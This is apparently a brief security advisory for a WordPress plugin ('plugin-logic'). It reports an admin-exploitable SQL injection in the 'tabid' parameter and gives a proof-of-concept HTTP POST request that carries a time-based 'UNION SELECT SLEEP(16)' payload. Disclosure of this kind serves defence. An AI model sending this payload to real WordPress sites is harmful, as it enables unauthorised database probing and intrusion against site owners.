The plugin does not sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high privilege users such as admin
POST /wp-admin/network/plugins.php?page=plugin-logic&tabid=options%20union%20SELECT%20SLEEP(16)%3b%23 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 123
Cookie: [admin+]
plulo_checklist%5B0%5D=0&plulo_checklist%5B0%5D=1&plulo_radiolist%5B0%5D=0&plulo_txt_list%5B0%5D=&plulo_submit=Save+Changes